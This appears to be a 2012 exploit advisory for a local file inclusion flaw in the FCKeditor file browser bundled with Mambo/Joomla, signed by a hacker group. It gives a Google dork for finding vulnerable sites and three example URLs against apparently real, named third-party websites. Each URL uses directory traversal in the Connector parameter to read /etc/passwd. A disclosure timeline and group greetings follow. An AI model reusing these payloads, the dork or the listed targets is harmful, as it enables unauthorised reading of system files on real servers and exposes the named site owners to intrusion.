##################################################
mambo /joomla (fckeditor) lfi Vulnerability
##################################################

 # Exploit Title :mambo /joomla (fckeditor) lfi Vulnerability
 # Google Dork: /mambots/editors/fckeditor/editor/filemanager/browser/default
 #Author: BHG Security Center
 # Home: http://cc.black-hg.org - http://greyh4t.com/cc/
 # Tested on: [linux+apache]
 # Finder(s):Siavash (morghabi_s@yahoo.com)
 # Examle:
 http://chaboille.voyageur.coop/mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../../../../etc/passwd
 http://council.mcsquaredllc.com/mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../../../../etc/passwd
 http://www.intexsac.com/espanol/mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../../../../etc/passwd
 and more in go0gle
##################################################
[-] Disclosure timeline:

[04/08/2011] - Vulnerabilities discovered
[14/10/2011] - Others vulnerabilities discovered
[15/10/2011] - Issues reported to http://black-hg.org
[04/09/2012] - Public disclosure

# Greets To :
Net.Edit0r ~ A.Cr0x ~ 3H34N ~ G3n3Rall ~ l4tr0d3ctism ~ NoL1m1t

~ Mr.XHat THANKS TO ALL Iranian HackerZ ./Persian Gulf

===========================================[End]=============================================